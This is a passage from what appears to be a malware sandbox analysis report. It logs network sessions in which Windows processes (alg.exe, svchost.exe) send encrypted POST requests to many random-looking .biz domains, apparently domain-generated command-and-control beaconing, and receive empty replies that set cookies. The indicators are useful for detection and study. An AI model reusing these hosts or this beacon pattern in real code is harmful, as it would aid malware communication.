                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.858628988 CEST786OUTData Raw: c3 31 64 07 5d cc 9c 80 06 03 00 00 64 b5 4d 72 d0 e6 ad 1a 43 3e a4 73 ff ab 5f 08 a0 0d 57 19 4d 1e 48 dd 25 54 50 8f 2b 1e 1c ea 29 ea 74 01 6a fd 45 aa e3 01 c6 5c ff 2b 04 0d 5c ed 4e e5 2e d7 da 6e 83 24 2d 91 70 e1 23 6d d1 75 b4 e6 ac b3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1d]dMrC>s_WMH%TP+)tjE\+\N.n$-p#muGz:tqTnm^6*Y5cnah{HP2.$V/a9QmMVd+m7$,BKb7%y%um#*C1:mb!G
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.206729889 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d44c2b2ed0fbd58a4c41f68ea1b3bd7c|8.46.123.33|1728394144|1728394144|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              72192.168.2.44999818.208.156.248802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381483078 CEST350OUTPOST /bssxxkwdr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381508112 CEST778OUTData Raw: 56 a8 00 80 1c e0 f7 fa fe 02 00 00 dd 7b fe d2 33 74 53 f8 91 9f 8e fb 5b 4e d2 92 fd 11 07 7d 33 69 f7 05 07 5d e3 d2 f2 51 4d de 41 ef da b6 cd eb c7 5e e6 42 59 da c4 e2 25 d1 43 62 9a 0e 8f 62 fe f2 18 ca 84 4e 04 26 bb 4b 91 ba a2 9e 80 d0
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: V{3tS[N}3i]QMA^BY%CbbN&KlVJOTyR55jR"jze0s;SO{&v.Jn(`9Pu9g&\)9^Eo=)8W;`A~{<-*2'K;zz4w6MD
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.863178015 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=71463a8800326601640a2997905a3bf4|8.46.123.33|1728394144|1728394144|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              73192.168.2.45000444.221.84.105802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.150259972 CEST345OUTPOST /t HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.150288105 CEST778OUTData Raw: 64 52 88 52 66 c7 f9 cf fe 02 00 00 9b 71 ce 9a 8a 74 59 f4 8b 06 d5 36 1b 46 05 82 df e8 7e 8d bb e6 7d c7 20 3e 34 cf b7 4d 82 30 8d 2e f5 4a 78 ac 2a 90 b6 5a 74 18 92 c3 61 50 4f 6d 85 fd 0e 01 f2 36 bc b3 a7 b5 32 6f 85 e0 47 37 de 08 70 8b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dRRfqtY6F~} >4M0.Jx*ZtaPOm62oG7p`6Dw:#.BU4!<,=[yOD*"u{6hnk';eNjA[>uJ^F-2TfAE({%z0lfoU$
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.787585020 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b0e31ba57d24e9d74f4313b9f5e7ffaa|8.46.123.33|1728394145|1728394145|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              74192.168.2.45000734.211.97.45804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.352960110 CEST356OUTPOST /jweaqenrkqbo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.352991104 CEST786OUTData Raw: 18 66 5f bd f6 bd bd ae 06 03 00 00 a3 26 d9 04 6b 02 a9 a2 e2 e4 e4 f3 22 7f 72 d8 2e a3 74 50 66 3f 92 2c b5 fa ed e6 73 41 56 45 8b 85 1e 9c 65 74 52 61 47 30 39 46 f5 c0 c4 53 0a 5b aa e1 83 e0 e7 7b 09 2e 56 d2 12 5e db d6 36 9f 2f 97 40 78
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f_&k"r.tPf?,sAVEetRaG09FS[{.V^6/@x)'GcL+OPfgyJoa),c,6]I/tHPD>dV#KOP[;4F(XA)JL{!FKtiIwacnTb>Q
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.095817089 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4b2219addcc0f3c1360e10cd921751b6|8.46.123.33|1728394145|1728394145|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              75192.168.2.45001218.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.142559052 CEST355OUTPOST /fehxmtmgeeq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.142577887 CEST778OUTData Raw: 71 b0 d1 82 24 4c 1d 7f fe 02 00 00 ae 07 25 96 a2 6d 18 d5 cf 28 64 f7 15 61 4a 4c 7c 65 66 3a b6 8f 33 41 02 a6 35 e0 99 81 c0 47 62 40 32 9c a1 5e 0c 4d ec 3f 5d 4a 48 eb 3a 75 28 d6 8d 20 07 64 0c 2e 09 0c d4 b1 55 cd 42 0d dc 7e 1f ef c0 bb
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: q$L%m(daJL|ef:3A5Gb@2^M?]JH:u( d.UB~-f,$ZN#ouRb&C'{\c4E&U0xNM1cZZC*7f]2*v*NZov"[.'>`y'1kw#\8z1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.490571976 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=254a08ae381ed90c5996adad68dfa9f1|8.46.123.33|1728394147|1728394147|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              76192.168.2.45001447.129.31.212804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.246133089 CEST343OUTPOST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.246154070 CEST786OUTData Raw: 59 22 39 50 ea ad 1e 54 06 03 00 00 f6 34 0d 7f 9d 09 93 40 c0 fc 12 71 58 0c 2e 7e 29 89 7a e1 cf 2c 60 8f 67 4b 68 e7 2c 2a 1f a5 95 5c c2 da 70 20 82 27 90 d2 d6 0f 65 59 3d 37 f4 85 33 d1 85 dd 27 de 45 d0 1d c0 17 3c 0d 23 fd ac a3 a7 0c f3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Y"9PT4@qX.~)z,`gKh,*\p 'eY=73'E<#Mv/CJ(BR8bSiA%\E["H?iu[nFa%g,QYXB}SUR3qSK@VKH|&P{X9`*T]
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.583611965 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c56e185517ceadd6d3e19e89c2819c69|8.46.123.33|1728394147|1728394147|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              77192.168.2.45002413.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.696990967 CEST346OUTPOST /aya HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.697006941 CEST786OUTData Raw: e3 74 84 7a d9 ea 5c 89 06 03 00 00 7f 78 a5 2b ec b8 ea 3d 33 8e 64 55 f8 52 51 43 e5 7b 96 a0 62 93 12 6a 41 9e 2e 18 6b 3c d9 15 78 b0 0e 5b 41 8f 29 53 06 88 d0 58 ee 98 8b f6 bd de c0 44 65 a3 b6 36 44 39 db 47 80 4d 72 fc 48 02 1c 1b 23 05
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tz\x+=3dURQC{bjA.k<x[A)SXDe6D9GMrH#zC(Y4LVgsm$NAk0|x/kiQU#a>3?h2 `2Ki}3|z,ENn6 0@JE~H?!k#1%)
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.041747093 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=19b5cd6332a736ffe81d5a548e6a73e9|8.46.123.33|1728394148|1728394148|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              78192.168.2.45002644.213.104.86802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.865319014 CEST346OUTPOST /sopra HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.865330935 CEST778OUTData Raw: 5e 8f ef e7 e5 ac bc 4d fe 02 00 00 40 f4 67 54 44 61 70 bd 82 fd 06 8b e9 37 a5 0a 19 fd 32 d3 9d 38 67 f5 83 c5 d4 8a 9d 79 9b 04 f4 44 5b 1f 72 63 69 68 66 77 3f b1 6b 93 0f f9 4a ce fb 54 a3 d3 1e 89 e1 83 57 de 65 df 08 16 bb 5e cd b9 2a 06
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^M@gTDap728gyD[rcihfw?kJTWe^*W(wlG5;0_+@YXGb0'x}c8J]${Bfphgt8EGe]9L|~j$GkF/MC^k$@8&a5
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.350023985 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3bfc23e3bd066d61f89c0006040b17a1|8.46.123.33|1728394148|1728394148|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              79192.168.2.45003218.208.156.248802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.657721043 CEST346OUTPOST /hb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.657721043 CEST778OUTData Raw: d1 c9 b5 a3 37 14 a4 a9 fe 02 00 00 aa 2b ad f1 41 b8 4e 42 de 82 02 8a 4f c9 9e e4 ab 2e 72 3b 89 9d 86 e6 1b 9c 4a 8c 47 ab da d7 14 79 8f 38 d6 8d 35 95 a6 cc c8 3d 60 07 05 f8 7d b4 46 48 71 92 97 4e 54 c3 60 81 1c f3 9a 68 1c e0 de 9c d4 55
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7+ANBO.r;JGy85=`}FHqNT`hUDSF,H2d)Y<Yj'{JRZE2zil/(S>TKwlw,8LH-5pZ"9NXOnZV9>XKryP42MhI%A
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.115070105 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=380fbf0e95c15fe563896ec9eb501d0e|8.46.123.33|1728394149|1728394149|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              80192.168.2.45003934.211.97.45804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.339202881 CEST345OUTPOST /aaxb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.339225054 CEST786OUTData Raw: a6 c0 44 30 30 56 29 d0 06 03 00 00 c6 cf d8 d4 41 ce ab 83 bf 44 a8 d0 1b fa 2d 45 85 26 d8 91 39 39 6e 5d 4b 33 bb 89 b8 5d d2 7d 08 ca cc 77 7d 4c 6a fd 97 f5 fb f9 ed 33 f2 0f 5d 5d e6 31 14 c8 11 77 92 6b 7e 0d f4 a4 8b 9c 98 78 d2 90 c3 21
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: D00V)AD-E&99n]K3]}w}Lj3]]1wk~x!vXb"u]7xy`^a<mSw_DaZ1{O;xEjw K/o'eArX4}/ '"o>H,Bvdq*B*97
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.093199015 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a8b9ed834ecfce04844d95e3e99b68d8|8.46.123.33|1728394149|1728394149|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
